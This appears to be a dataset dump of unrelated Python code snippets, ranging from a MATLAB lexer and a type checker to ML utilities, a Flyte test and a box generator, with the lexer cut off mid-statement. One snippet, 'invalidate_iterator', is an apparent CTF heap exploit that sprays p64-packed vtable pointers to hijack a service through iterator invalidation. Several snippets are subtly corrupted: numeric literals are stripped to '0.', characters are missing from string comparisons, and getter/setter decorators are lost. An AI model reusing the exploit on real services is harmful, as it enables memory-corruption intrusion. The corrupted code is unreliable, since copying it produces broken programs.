code stringlengths 281 23.7M |
|---|
def check_type_exc(pattern, obj, path=None):
try:
if isinstance(pattern, (list, tuple)):
_check_isinstance(obj, (list, tuple))
if ((len(pattern) == 2) and (pattern[(- 1)] is ...)):
cls = pattern[0]
for (i, v) in enumerate(obj):
check_type_exc(cls, v, i)
else:
check((len(pattern) == len(obj)))
for (i, (cls, v)) in enumerate(zip(pattern, obj)):
check_type_exc(cls, v, i)
elif isinstance(pattern, dict):
_check_isinstance(obj, dict)
if (... in pattern):
pattern = dict(pattern)
match = pattern.pop(...)
else:
match = '!'
if (match in set('?!=')):
lkeys = set(pattern.keys())
rkeys = set(obj.keys())
if (match == '!'):
iterkeys = lkeys
elif (match == '?'):
iterkeys = (lkeys & rkeys)
elif (match == '='):
check((lkeys == rkeys))
iterkeys = lkeys
else:
assert False, 'WTF?!'
for k in iterkeys:
check_type_exc(pattern[k], obj.get(k, _check_key_not_exists), k)
elif (match is ...):
assert (len(pattern) == 1), 'Invalid dict pattern'
(kt, vt) = list(pattern.items())[0]
for k in obj:
check_type_exc(kt, k, ('<%s>' % kt.__name__))
check_type_exc(vt, obj[k], k)
else:
assert False, 'Invalid dict match type'
elif issubclass(type(pattern), types.FunctionType):
try:
check(pattern(obj))
except Exception as e:
raise CheckFailed from e
elif issubclass(type(pattern), (int, str, bytes, tuple)):
check((obj == pattern))
else:
_check_isinstance(obj, pattern)
except CheckFailed as e:
if (path is not None):
e.path.insert(0, path)
else:
e.finalize()
raise |
class TrainingState(NamedTuple):
policy_params: networks_lib.Params
policy_opt_state: optax.OptState
value_params: networks_lib.Params
value_opt_state: optax.OptState
critic_params: networks_lib.Params
critic_opt_state: optax.OptState
target_critic_params: networks_lib.Params
key: types.PRNGKey
steps: int |
def invalidate_iterator(vtable):
send_command('create test')
send_command('create db')
filler = 24
all_killer = 512
for i in xrange(filler):
send_command(('store db string %s %s' % (str(i), ('A' * i))))
send_command(('getter db %s %s' % (1, str(all_killer))))
send_getter('empty')
for i in xrange(1, all_killer):
send_getter(('store string 1 %s' % p64(vtable)))
print(i, all_killer)
send_command('print db') |
def RdYlGn(range, **traits):
_data = dict(red=[(0.0, 0., 0.), (0.1, 0., 0.), (0.2, 0., 0.), (0.3, 0., 0.), (0.4, 0., 0.), (0.5, 1.0, 1.0), (0.6, 0., 0.), (0.7, 0., 0.), (0.8, 0.4, 0.4), (0.9, 0., 0.), (1.0, 0.0, 0.0)], green=[(0.0, 0.0, 0.0), (0.1, 0., 0.), (0.2, 0., 0.), (0.3, 0., 0.), (0.4, 0., 0.), (0.5, 1.0, 1.0), (0.6, 0., 0.), (0.7, 0., 0.), (0.8, 0., 0.), (0.9, 0., 0.), (1.0, 0., 0.)], blue=[(0.0, 0., 0.), (0.1, 0., 0.), (0.2, 0., 0.), (0.3, 0., 0.), (0.4, 0., 0.), (0.5, 0., 0.), (0.6, 0., 0.), (0.7, 0., 0.), (0.8, 0., 0.), (0.9, 0., 0.), (1.0, 0., 0.)])
return ColorMapper.from_segment_map(_data, range=range, **traits) |
def test_lp_all_parameters():
nt = typing.NamedTuple('OutputsBC', [('t1_int_output', int), ('c', str)])
def t1(a: int) -> nt:
a = (a + 2)
return nt(a, ('world-' + str(a)))
def t2(a: str, b: str, c: str) -> str:
return ((b + a) + c)
def wf(a: int, c: str) -> str:
(x, y) = t1(a=a)
u = t2(a=x, b=y, c=c)
return u
obj = CronSchedule('* * ? * * *', kickoff_time_input_arg='abc')
obj1 = CronSchedule('10 * ? * * *', kickoff_time_input_arg='abc')
slack_notif = notification.Slack(phases=[_execution_model.WorkflowExecutionPhase.SUCCEEDED], recipients_email=['my-'])
auth_role_model = AuthRole(assumable_iam_role='my:iam:role')
labels = Labels({'label': 'foo'})
annotations = Annotations({'anno': 'bar'})
raw_output_data_config = RawOutputDataConfig('s3://foo/output')
lp = launch_plan.LaunchPlan.get_or_create(workflow=wf, name='get_or_create', default_inputs={'a': 3}, fixed_inputs={'c': '4'}, schedule=obj, notifications=[slack_notif], auth_role=auth_role_model, labels=labels, annotations=annotations, raw_output_data_config=raw_output_data_config)
lp2 = launch_plan.LaunchPlan.get_or_create(workflow=wf, name='get_or_create', default_inputs={'a': 3}, fixed_inputs={'c': '4'}, schedule=obj, notifications=[slack_notif], auth_role=auth_role_model, labels=labels, annotations=annotations, raw_output_data_config=raw_output_data_config)
assert (lp is lp2)
with pytest.raises(AssertionError):
launch_plan.LaunchPlan.get_or_create(workflow=wf, name='get_or_create', default_inputs={'a': 3}, fixed_inputs={'c': '4'}, schedule=obj1, notifications=[slack_notif], auth_role=auth_role_model, labels=labels, annotations=annotations, raw_output_data_config=raw_output_data_config) |
def train_val_split(df, n_val_samples: int, filter_out_unseen: bool=False) -> Tuple[(pd.DataFrame, pd.DataFrame)]:
if filter_out_unseen:
(train, val) = train_test_split(df, test_size=int((1.1 * n_val_samples)), random_state=42)
logger.info('Train shape: {}, val shape: {}'.format(train.shape, val.shape))
train_product_set = set(train['product1']).union(set(train['product2']))
logger.info('No. of unique products in train: {:,}'.format(len(train_product_set)))
val = val[(val['product1'].isin(train_product_set) & val['product2'].isin(train_product_set))]
logger.info('Updated val shape: {}'.format(val.shape))
val = val.iloc[:n_val_samples].copy()
logger.info('Final val shape: {}'.format(val.shape))
train = df[(~ df.index.isin(set(val.index)))].copy()
logger.info('Final train shape: {}'.format(train.shape))
else:
(train, val) = train_test_split(df, test_size=int(n_val_samples), random_state=42)
logger.info('Train shape: {}, val shape: {}'.format(train.shape, val.shape))
return (train, val) |
class Base_MATLAB_Language(Base_Language):
def __init__(self, name):
super().__init__(name)
self.token_kinds.add('NVP_DELEGATE')
self.tokens_with_implicit_value.add('NVP_DELEGATE')
self.has_nvp_delegate = True
self.keywords.add('spmd')
self.function_contract_keywords.add('arguments')
self.allow_classdef_subfunctions = True
def parse_version(cls, version):
if (version == 'latest'):
return ('latest', None)
else:
match = re.match('^(20\\d\\d)([ab])$', version)
if (match is None):
raise ValueError('MATLAB version must be YEAR[ab], e.g. 2017b')
(major, minor) = match.groups()
return (int(major), minor)
def get_version(cls, major, minor):
if (major == 'latest'):
language = MATLAB_Latest_Language()
elif ((major < 2017) or ((major == 2017) and (minor == 'a'))):
raise ValueError('earliest MATLAB language supported is 2017b')
elif ((major > 2022) or ((major == 2022) and (minor == 'b'))):
raise ValueError('latest MATLAB language supported is 2022a')
elif ((major < 2020) or ((major == 2020) and (minor == 'a'))):
language = MATLAB_2017b_Language()
elif (major < 2021):
language = MATLAB_2020b_Language()
else:
language = MATLAB_2021a_Language()
return language |
def build(fips_dir, proj_dir, cfg_name, target=None, build_tool_args=None):
dep.fetch_imports(fips_dir, proj_dir)
proj_name = util.get_project_name_from_dir(proj_dir)
util.ensure_valid_project_dir(proj_dir)
dep.gather_and_write_imports(fips_dir, proj_dir, cfg_name)
configs = config.load(fips_dir, proj_dir, cfg_name)
num_valid_configs = 0
if configs:
for cfg in configs:
(config_valid, _) = config.check_config_valid(fips_dir, proj_dir, cfg, print_errors=True)
if config_valid:
log.colored(log.YELLOW, '=== building: {}'.format(cfg['name']))
if (not gen_project(fips_dir, proj_dir, cfg, False)):
log.error("Failed to generate '{}' of project '{}'".format(cfg['name'], proj_name))
build_dir = util.get_build_dir(fips_dir, proj_name, cfg['name'])
num_jobs = settings.get(proj_dir, 'jobs')
result = cmake.run_build(fips_dir, target, cfg['build_type'], build_dir, num_jobs, build_tool_args)
if result:
num_valid_configs += 1
else:
log.error("Failed to build config '{}' of project '{}'".format(cfg['name'], proj_name))
else:
log.error("Config '{}' not valid in this environment".format(cfg['name']))
else:
log.error("No valid configs found for '{}'".format(cfg_name))
if (num_valid_configs != len(configs)):
log.error('{} out of {} configs failed!'.format((len(configs) - num_valid_configs), len(configs)))
return False
else:
log.colored(log.GREEN, '{} configs built'.format(num_valid_configs))
return True |
class PopularityBiasResult(MetricResult):
k: int
normalize_arp: bool
current_apr: float
current_coverage: float
current_gini: float
current_distr: Distribution
reference_apr: Optional[float] = None
reference_coverage: Optional[float] = None
reference_gini: Optional[float] = None
reference_distr: Optional[Distribution] = None |
def main():
heads = 3
key_mask = torch.LongTensor([[1, 1, 1, 0, 0], [1, 1, 1, 1, 0]])
(N, L) = key_mask.size()
mask = key_mask.view(N, 1, 1, L).repeat(1, heads, L, 1)
print('### Only the padding masks ###')
print(mask)
print(mask.shape)
sub_mask = subsequent_mask(L).view(1, 1, L, L).repeat(N, heads, 1, 1)
mask = torch.logical_and(mask, sub_mask).long()
print('### With subsequent mask ###')
print(mask)
print(mask.shape) |
class OptionSeriesArearangeSonificationContexttracksMappingTremoloSpeed(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
class HalfBox(Boxes):
description = 'This can be used to create:\n\n* a hanging shelf:\n\n\n* an angle clamping jig:\n\n\n* a bookend:\n\n\nand many more...\n\n'
ui_group = 'Box'
def __init__(self) -> None:
Boxes.__init__(self)
self.addSettingsArgs(edges.FingerJointSettings, finger=2.0, space=2.0)
self.addSettingsArgs(edges.MountingSettings)
self.buildArgParser(x=100, sy='50:50', h=100)
self.argparser.add_argument('--Clamping', action='store', type=boolarg, default=False, help='add clamping holes')
self.argparser.add_argument('--ClampingSize', action='store', type=float, default=25.0, help='diameter of clamping holes')
self.argparser.add_argument('--Mounting', action='store', type=boolarg, default=False, help='add mounting holes')
self.argparser.add_argument('--Sturdy', action='store', type=boolarg, default=False, help='create sturdy construction (e.g. shelf, clamping jig, ...)')
def polygonWallExt(self, borders, edge='f', turtle=False, callback=None, move=None):
for i in range(0, len(borders), 4):
self.cc(callback, i)
length = borders[i]
next_angle = borders[(i + 1)]
next_radius = borders[(i + 2)]
next_edge = borders[(i + 3)]
e = self.edges.get(next_edge, next_edge)
if (i == 0):
self.moveTo(0, e.margin(), 0)
e(length)
if self.debug:
self.hole(0, 0, 1, color=Color.ANNOTATIONS)
self.corner(next_angle, tabs=0, radius=next_radius)
def xHoles(self):
posy = ((- 0.5) * self.thickness)
for y in self.sy[:(- 1)]:
posy += (y + self.thickness)
self.fingerHolesAt(posy, 0, self.x)
def hHoles(self):
posy = ((- 0.5) * self.thickness)
for y in reversed(self.sy[1:]):
posy += (y + self.thickness)
self.fingerHolesAt(posy, 0, self.h)
def render(self):
(x, h) = (self.x, self.h)
d = self.ClampingSize
t = self.thickness
l = math.sqrt(((x * x) + (h * h)))
b = math.degrees(math.asin((x / l)))
c = math.degrees(math.asin((h / l)))
if (x > h):
if (((90 + b) + c) < 179):
b = (180 - b)
elif (((90 + b) + c) < 179):
c = (180 - c)
h1 = (((2 * t) / x) * h)
l1 = (((2 * t) / x) * l)
x2 = (((2 * t) / h) * x)
l2 = (((2 * t) / h) * l)
if self.Sturdy:
width = (sum(self.sy) + ((len(self.sy) - 1) * t))
self.rectangularWall(x, width, 'fffe', callback=[None, self.xHoles, None, None], move='right', label='bottom')
self.rectangularWall(h, width, ('fGfF' if self.Mounting else 'fefF'), callback=[None, None, None, self.hHoles], move='up', label='back')
self.rectangularWall(x, width, 'fffe', callback=[None, self.xHoles, None, None], move='left only', label='invisible')
for i in range(2):
self.move((((x + x2) + (2 * t)) + self.edges['f'].margin()), (((h + h1) + (2 * t)) + self.edges['f'].margin()), 'right', True, label=('side ' + str(i)))
self.polygonWallExt(borders=[x2, 0, 0, 'e', x, 0, 0, 'h', (2 * t), 90, 0, 'e', (2 * t), 0, 0, 'e', h, 0, 0, 'h', h1, (180 - b), 0, 'e', ((l + l1) + l2), (180 - c), 0, 'e'])
if self.Clamping:
self.hole(0, 0, 1, color=Color.ANNOTATIONS)
self.rectangularHole(((x / 2) + x2), ((2 * t) + (d / 2)), dx=d, dy=d, r=(d / 8))
self.rectangularHole(((((x + x2) + (2 * t)) - (2 * t)) - (d / 2)), ((h / 2) + (2 * t)), dx=d, dy=d, r=(d / 8))
self.move((((x + x2) + (2 * t)) + self.edges['f'].margin()), (((h + h1) + (2 * t)) + self.edges['f'].margin()), 'right', False, label=('side ' + str(i)))
if (len(self.sy) > 1):
for i in range((len(self.sy) - 1)):
self.move((x + self.edges['f'].margin()), (h + self.edges['f'].margin()), 'right', True, label=('support ' + str(i)))
self.polygonWallExt(borders=[x, 90, 0, 'f', h, (180 - b), 0, 'f', l, (180 - c), 0, 'e'])
if self.Clamping:
self.rectangularHole((x / 2), ((d / 2) - (t / 2)), dx=d, dy=(d + t), r=(d / 8))
self.rectangularHole(((x - (d / 2)) + (t / 2)), (h / 2), dx=(d + t), dy=d, r=(d / 8))
self.move((x + self.edges['f'].margin()), (h + self.edges['f'].margin()), 'right', False, label=('support ' + str(i)))
else:
self.sy.insert(0, 0)
self.sy.append(0)
width = (sum(self.sy) + ((len(self.sy) - 1) * t))
self.rectangularWall(x, width, 'efee', callback=[None, self.xHoles, None, None], move='right', label='bottom')
self.rectangularWall(h, width, ('eGeF' if self.Mounting else 'eeeF'), callback=[None, None, None, self.hHoles], move='up', label='side')
self.rectangularWall(x, width, 'efee', callback=[None, self.xHoles, None, None], move='left only', label='invisible')
for i in range((len(self.sy) - 1)):
self.move((x + self.edges['f'].margin()), (h + self.edges['f'].margin()), 'right', True, label=('support ' + str(i)))
self.polygonWallExt(borders=[x, 90, 0, 'f', h, (180 - b), 0, 'f', l, (180 - c), 0, 'e'])
if self.Clamping:
self.rectangularHole((x / 2), (d / 2), dx=d, dy=d, r=(d / 8))
self.rectangularHole((x - (d / 2)), (h / 2), dx=d, dy=d, r=(d / 8))
self.move((x + self.edges['f'].margin()), (h + self.edges['f'].margin()), 'right', False, label=('support ' + str(i))) |
class MATLAB_Lexer(Token_Generator):
def __init__(self, language, mh, content, filename, blockname=None):
super().__init__(language, filename, blockname)
assert isinstance(content, str)
self.text = content
self.context_line = self.text.splitlines()
self.mh = mh
self.lexpos = (- 1)
self.col_offset = 0
self.line = 1
self.first_in_line = True
self.first_in_statement = True
self.bracket_stack = []
self.block_stack = []
self.add_comma = False
self.debug_comma = False
self.in_lambda = False
self.in_annotation = False
self.delay_list = []
self.command_mode = False
self.in_special_section = False
self.process_pragmas = True
self.block_comment = 0
self.cc = None
self.nc = (self.text[0] if (len(self.text) > 0) else '\x00')
self.nnc = (self.text[1] if (len(self.text) > 1) else '\x00')
self.nnnc = (self.text[2] if (len(self.text) > 2) else '\x00')
self.last_kind = None
self.last_value = None
def line_count(self):
return len(self.context_line)
def correct_tabs(self, tabwidth):
assert (isinstance(tabwidth, int) and (tabwidth >= 2))
new_lines = []
for line in self.context_line:
tmp = ''
for c in line:
if (c == '\t'):
tmp += (' ' * (tabwidth - (len(tmp) % tabwidth)))
else:
tmp += c
new_lines.append(tmp)
self.context_line = new_lines
self.text = ('\n'.join(new_lines) + '\n')
self.cc = None
self.nc = (self.text[0] if (len(self.text) > 0) else '\x00')
self.nnc = (self.text[1] if (len(self.text) > 1) else '\x00')
def skip(self):
self.lexpos += 1
if (self.cc == '\n'):
self.col_offset = self.lexpos
self.cc = self.nc
self.nc = self.nnc
self.nnc = self.nnnc
self.nnnc = (self.text[(self.lexpos + 3)] if (len(self.text) > (self.lexpos + 3)) else '\x00')
def advance(self, n):
assert (isinstance(n, int) and (n >= 0))
for _ in range(n):
self.skip()
def match_re(self, regex):
match = re.match(('^' + regex), self.text[self.lexpos:])
if (match is None):
return None
else:
return match.group(0)
def lex_error(self, message=None):
self.mh.lex_error(Location(filename=self.filename, blockname=self.blockname, line=self.line, col_start=(self.lexpos - self.col_offset), col_end=(self.lexpos - self.col_offset), context=self.context_line[(self.line - 1)]), (message if message else ('unexpected character %s' % repr(self.cc))))
def contains_block_open(self, string):
return any((((c + '{') in string) for c in self.language.comment_chars))
def contains_block_close(self, string):
return any((((c + '}') in string) for c in self.language.comment_chars))
def __token(self):
if self.add_comma:
self.add_comma = False
fake_line = self.context_line[(self.line - 1)]
fake_col = ((self.lexpos - self.col_offset) + 1)
fake_line = ((fake_line[:fake_col] + '<anon,>') + fake_line[fake_col:])
token = m_ast.MATLAB_Token(self.language, 'COMMA', ',', Location(filename=self.filename, blockname=self.blockname, line=self.line, col_start=fake_col, col_end=(fake_col + 6), context=fake_line), False, False, anonymous=True, annotation=self.in_annotation)
self.last_kind = 'COMMA'
self.last_value = ','
return token
preceeding_ws = False
while (not self.block_comment):
self.skip()
if (self.cc in (' ', '\t')):
preceeding_ws = True
else:
break
if self.block_comment:
self.skip()
kind = None
value = None
t_start = self.lexpos
col_start = (t_start - self.col_offset)
contains_quotes = False
if (self.cc == '\x00'):
return None
elif self.block_comment:
if (self.cc == '\n'):
kind = 'NEWLINE'
else:
kind = 'COMMENT'
while (self.nc not in ('\n', '\x00')):
self.skip()
elif self.command_mode:
if (self.cc in self.language.comment_chars):
kind = 'COMMENT'
while (self.nc not in ('\n', '\x00')):
self.skip()
elif (self.cc == '\n'):
kind = 'NEWLINE'
while (self.nc in ('\n', ' ', '\t')):
self.skip()
elif (self.cc == ';'):
kind = 'SEMICOLON'
elif (self.cc == ','):
kind = 'COMMA'
elif ((self.cc == '.') and (self.nc == '.') and (self.nnc == '.')):
kind = 'CONTINUATION'
while (self.cc not in ('\n', '\x00')):
self.skip()
else:
kind = 'CARRAY'
value = ''
local_brackets = 0
string_mode = False
open_quote_location = None
if (self.cc == "'"):
string_mode = True
else:
value += self.cc
while True:
if string_mode:
if ((self.nc == "'") and (self.nnc == "'")):
value += "'"
self.skip()
elif (self.nc == "'"):
string_mode = False
open_quote_location = None
elif (self.nc in '\x00\n'):
self.mh.lex_error(open_quote_location, 'this command form string is not terminated properly', fatal=False)
break
else:
value += self.nc
else:
if (self.cc in '({['):
local_brackets += 1
elif (self.cc in ')}]'):
local_brackets -= 1
if ((self.nc == '.') and (self.nnc == '.') and (self.nnnc == '.')):
break
elif (self.nc in self.language.comment_chars):
break
elif (self.nc in '\n\x00'):
break
elif ((local_brackets == 0) and (self.nc in ' \t,;')):
break
elif (self.nc == "'"):
string_mode = True
open_quote_location = Location(filename=self.filename, blockname=self.blockname, line=self.line, col_start=((self.lexpos + 1) - self.col_offset), col_end=((self.lexpos + 1) - self.col_offset), context=self.context_line[(self.line - 1)])
else:
value += self.nc
self.skip()
elif ((self.cc in self.language.comment_chars) and (self.nc == '|') and self.first_in_line and self.process_pragmas):
self.in_annotation = True
kind = 'ANNOTATION'
self.skip()
elif (self.cc in self.language.comment_chars):
kind = 'COMMENT'
while (self.nc not in ('\n', '\x00')):
self.skip()
elif (self.cc == '\n'):
kind = 'NEWLINE'
if self.in_annotation:
pass
else:
while (self.nc in ('\n', ' ', '\t')):
self.skip()
elif (self.cc == ';'):
kind = 'SEMICOLON'
elif ((not self.in_annotation) and (self.cc == '.') and (self.nc == '.')):
self.skip()
if (self.nc == '.'):
kind = 'CONTINUATION'
self.skip()
while (self.cc not in ('\n', '\x00')):
self.skip()
else:
self.lex_error('expected . to complete continuation token')
elif (self.cc.isalpha() or (self.language.identifiers_starting_with_underscore and (self.cc == '_'))):
kind = 'IDENTIFIER'
while (self.nc.isalnum() or (self.nc == '_')):
self.skip()
elif ((self.cc == '0') and (self.nc in ('x', 'X', 'b', 'B')) and self.language.hex_literals):
kind = 'NUMBER'
self.skip()
if (self.cc in ('x', 'X')):
allowed_digits = 'aAbBcCdDeEfF'
bits_per_digit = 4
else:
allowed_digits = '01'
bits_per_digit = 1
digits = ''
while (self.nc in allowed_digits):
self.skip()
digits += self.cc
if (len(digits) == 0):
self.lex_error((('at least one %s digit required' % 'binary') if (bits_per_digit == 1) else 'hex'))
if (self.nc in ('u', 'U', 's', 'S')):
self.skip()
suffix = ''
while (self.nc in ''):
self.skip()
suffix += self.cc
if (suffix not in ('8', '16', '32', '64')):
self.lex_error('suffix must be 8, 16, 32, or 64')
else:
max_digits = (int(suffix) // bits_per_digit)
else:
max_digits = (64 // bits_per_digit)
if (len(digits) > max_digits):
self.lex_error(('too many digits for %u-bit %s literal' % ((max_digits * bits_per_digit), ('binary' if (bits_per_digit == 1) else 'hex'))))
if (self.nc.isnumeric() or ((self.nc == '.') and self.nnc.isnumeric())):
self.skip()
self.lex_error()
elif (self.cc.isnumeric() or ((self.cc == '.') and self.nc.isnumeric())):
kind = 'NUMBER'
tmp = self.match_re('([0-9]+(\\.[0-9]*)?([eE][+-]?[0-9]+)?[iIjJ]?)|(\\.[0-9]+([eE][+-]?[0-9]+)?[iIjJ]?)')
if tmp.endswith('.'):
self.advance((len(tmp) - 2))
if (self.nnc not in ('/', '\\', '*', "'", '^')):
self.skip()
else:
self.advance((len(tmp) - 1))
if (self.nc.isnumeric() or ((self.nc == '.') and self.nnc.isnumeric())):
self.skip()
self.lex_error()
elif ((self.cc in ('<', '>', '=', '~')) or ((self.cc == '!') and self.language.bang_is_negation)):
if (self.nc == '='):
self.skip()
kind = 'OPERATOR'
elif (self.cc == '='):
kind = 'ASSIGNMENT'
else:
kind = 'OPERATOR'
elif (self.cc in ('+', '-', '*', '/', '^', '\\')):
kind = 'OPERATOR'
elif (self.cc in ('&', '|')):
kind = 'OPERATOR'
if (self.nc == self.cc):
self.skip()
elif ((self.cc == '.') and (self.nc in ('*', '/', '\\', '^', "'"))):
kind = 'OPERATOR'
self.skip()
elif ((self.cc == '.') and (self.nc == '?') and self.language.has_nvp_delegate):
kind = 'NVP_DELEGATE'
self.skip()
elif (self.cc == "'"):
kind = None
if (preceeding_ws or self.first_in_line):
kind = 'CARRAY'
contains_quotes = True
elif (self.last_kind in ('IDENTIFIER', 'NUMBER', 'KET', 'M_KET', 'C_KET')):
kind = 'OPERATOR'
elif ((self.last_kind == 'OPERATOR') and (self.last_value in (".'", "'"))):
kind = 'OPERATOR'
elif (self.last_kind in ('BRA', 'M_BRA', 'C_BRA', 'COMMA', 'CARRAY', 'ASSIGNMENT', 'OPERATOR', 'SEMICOLON', 'COLON', 'KEYWORD')):
kind = 'CARRAY'
contains_quotes = True
else:
self.lex_error('unable to distinguish between string and transpose operation')
if (kind == 'CARRAY'):
while True:
self.skip()
if ((self.cc == "'") and (self.nc == "'")):
self.skip()
elif (self.cc == "'"):
break
elif (self.cc in ('\n', '\x00')):
self.lex_error()
elif (self.cc == '"'):
kind = 'STRING'
contains_quotes = True
while True:
self.skip()
if ((self.cc == '"') and (self.nc == '"')):
self.skip()
elif (self.cc == '"'):
break
elif (self.cc in ('\n', '\x00')):
self.lex_error()
elif (self.cc == ','):
kind = 'COMMA'
elif (self.cc == ':'):
kind = 'COLON'
elif (self.cc == '('):
kind = 'BRA'
elif (self.cc == ')'):
kind = 'KET'
elif (self.cc == '{'):
kind = 'C_BRA'
elif (self.cc == '}'):
kind = 'C_KET'
elif (self.cc == '['):
kind = 'M_BRA'
elif (self.cc == ']'):
kind = 'M_KET'
elif (self.cc == '.'):
kind = 'SELECTION'
elif (self.cc == ''):
kind = 'AT'
elif ((self.cc == '!') and (not self.language.bang_is_negation)):
while (self.nc not in ('\n', '\x00')):
self.skip()
kind = 'BANG'
elif (self.cc == '?'):
kind = 'METACLASS'
else:
self.lex_error()
t_end = self.lexpos
col_end = (t_end - self.col_offset)
raw_text = self.text[t_start:(t_end + 1)]
if ((kind == 'IDENTIFIER') and (self.last_kind != 'SELECTION')):
if (self.in_annotation and (raw_text in self.language.annotation_keywords)):
kind = 'KEYWORD'
elif ((not self.in_annotation) and (raw_text in self.language.keywords)):
kind = 'KEYWORD'
if (not self.bracket_stack):
if ((kind == 'KEYWORD') and (raw_text in ('classdef', 'function', 'for', 'if', 'parfor', 'switch', 'try', 'while', 'spmd'))):
self.block_stack.append(raw_text)
if (self.block_stack and (kind == 'IDENTIFIER')):
extra_kw = set()
if (self.last_kind == 'SELECTION'):
pass
elif (self.block_stack[(- 1)] == 'classdef'):
extra_kw = self.language.class_keywords
elif ((self.block_stack[(- 1)] != 'methods') and (self.block_stack[(- 1)] in self.language.class_keywords)):
extra_kw = self.language.class_keywords
elif (self.block_stack[(- 1)] == 'function'):
extra_kw = self.language.function_contract_keywords
if (raw_text in extra_kw):
kind = 'KEYWORD'
self.block_stack.append(raw_text)
elif ((kind == 'KEYWORD') and (raw_text == 'end') and self.first_in_statement):
if self.block_stack:
self.block_stack.pop()
self.in_special_section = False
if ((kind == 'KEYWORD') and (raw_text in ('properties', 'events', 'enumeration', 'arguments'))):
self.in_special_section = True
if ((self.line - 1) < len(self.context_line)):
ctx_line = self.context_line[(self.line - 1)]
else:
raise ICE(('line is larger than the length of the file %s' % self.filename))
token = m_ast.MATLAB_Token(self.language, kind, raw_text, Location(filename=self.filename, blockname=self.blockname, line=self.line, col_start=col_start, col_end=col_end, context=ctx_line), self.first_in_line, self.first_in_statement, value=value, contains_quotes=contains_quotes, block_comment=(self.block_comment > 0), annotation=self.in_annotation)
self.first_in_line = False
self.first_in_statement = False
if ((kind == 'BRA') and (self.last_kind == 'AT')):
self.in_lambda = True
if (kind == 'NEWLINE'):
self.line += token.raw_text.count('\n')
self.first_in_line = True
self.in_annotation = False
elif (kind == 'CONTINUATION'):
self.line += 1
self.first_in_line = True
if (self.language.allow_command_form and (not self.in_special_section) and (not self.in_annotation) and token.first_in_statement and (token.kind == 'IDENTIFIER') and (self.nc in (' ', '\t'))):
mode = 'search_ws'
for (n, c) in enumerate(self.text[(self.lexpos + 1):], (self.lexpos + 1)):
if (mode == 'search_ws'):
if (c == '\n'):
break
elif (c in (' ', '\t')):
pass
elif (c == '('):
break
elif (c == ')'):
self.advance((n - self.lexpos))
self.lex_error('MATLAB/Octave cannot process command starting with )')
elif (c in "+-*/\\^'?:"):
mode = 'found_op'
elif (c in '<>&|~.='):
if ((c == '.') and (self.text[n:(n + 3)] == '...')):
break
elif ((n + 1) < len(self.text)):
nc = self.text[(n + 1)]
else:
break
if ((c == '<') and (nc == '=')):
mode = 'skip_one'
elif ((c == '>') and (nc == '=')):
mode = 'skip_one'
elif ((c == '&') and (nc == '&')):
mode = 'skip_one'
elif ((c == '|') and (nc == '|')):
mode = 'skip_one'
elif ((c == '~') and (nc == '=')):
mode = 'skip_one'
elif ((c == '.') and (nc in "*/\\&'?")):
mode = 'skip_one'
elif ((c == '=') and (nc == '=')):
mode = 'skip_one'
elif (c == '='):
break
else:
mode = 'found_op'
else:
self.command_mode = True
break
elif (mode == 'skip_one'):
mode = 'found_op'
elif (mode == 'found_op'):
if (c in (' ', '\t')):
break
else:
self.command_mode = True
break
else:
raise ICE('logic error')
if (not self.bracket_stack):
if ((kind in ('NEWLINE', 'COMMA', 'SEMICOLON')) or ((token.kind == 'KEYWORD') and (token.value == 'try'))):
self.first_in_statement = True
self.command_mode = False
if ((token.kind == 'COMMENT') and (((self.block_comment == 0) and (token.raw_text[1:2] == '{')) or ((self.block_comment > 0) and self.contains_block_open(token.raw_text)))):
if ((not token.first_in_line) and (self.block_comment == 0)):
self.mh.check(token.location, 'ignored block comment: it must not be preceded by program text', 'ignored_block_comment', 'low')
elif ((token.value.strip() != '{') and (self.block_comment == 0)):
self.mh.check(token.location, 'ignored block comment: no text must appear after the {', 'ignored_block_comment', 'low')
elif (token.raw_text.strip() not in [('%s{' % c) for c in self.language.comment_chars]):
self.mh.check(token.location, 'ignored block comment: no text must appear around the block comment marker', 'ignored_block_comment', 'low')
else:
self.block_comment += 1
token.block_comment = True
elif (self.block_comment and (token.kind == 'COMMENT')):
for c in self.language.comment_chars:
marker = (c + '}')
if (marker in token.raw_text):
if (token.raw_text.strip() == marker):
self.block_comment -= 1
token.value = '}'
else:
self.mh.check(token.location, ('ignored block comment end: no text must appear around the block comment marker %s' % marker), 'ignored_block_comment', 'low')
self.last_kind = kind
self.last_value = raw_text
if (token.kind in ('BRA', 'M_BRA', 'C_BRA')):
self.bracket_stack.append(token)
elif (token.kind in ('KET', 'M_KET', 'C_KET')):
if self.bracket_stack:
matching_bracket = self.bracket_stack.pop()
if (((token.kind == 'KET') and (matching_bracket.kind != 'BRA')) or ((token.kind == 'M_KET') and (matching_bracket.kind != 'M_BRA')) or ((token.kind == 'C_KET') and (matching_bracket.kind != 'C_BRA'))):
self.mh.lex_error(token.location, ('mismatched brackets %s ... %s' % (matching_bracket.raw_text, token.raw_text)))
else:
self.mh.lex_error(token.location, ('unmatched %s' % token.raw_text), False)
ws_is_significant = ((not self.language.ws_insignificant) and self.bracket_stack and (self.bracket_stack[(- 1)].kind in ('M_BRA', 'C_BRA')) and (self.bracket_stack[(- 1)] != token))
ws_follows = (self.nc in (' ', '\t'))
skip_cont = False
next_non_ws = None
after_next_non_ws = None
for (n, c) in enumerate(self.text[(self.lexpos + 1):], (self.lexpos + 1)):
if (skip_cont and (c == '\n')):
skip_cont = False
elif skip_cont:
pass
elif ((c in (' ', '\t')) and (next_non_ws is None)):
pass
elif ((self.text[n:(n + 3)] == '...') and (next_non_ws is None)):
skip_cont = True
ws_follows = True
elif (next_non_ws is None):
next_non_ws = c
else:
after_next_non_ws = c
break
token_relevant = ((token.kind in ('IDENTIFIER', 'NUMBER', 'CARRAY', 'STRING', 'KET', 'M_KET', 'C_KET')) or ((token.kind == 'KEYWORD') and (token.value == 'end')) or ((token.kind == 'OPERATOR') and (token.value in ("'", ".'"))))
if (next_non_ws and after_next_non_ws):
if ((next_non_ws == '.') and after_next_non_ws.isdigit()):
pass
elif (next_non_ws in '*/\\^<>&|=.:!'):
token_relevant = False
elif ((next_non_ws == '~') and (after_next_non_ws == '=')):
token_relevant = False
if (ws_is_significant and ws_follows and next_non_ws and token_relevant):
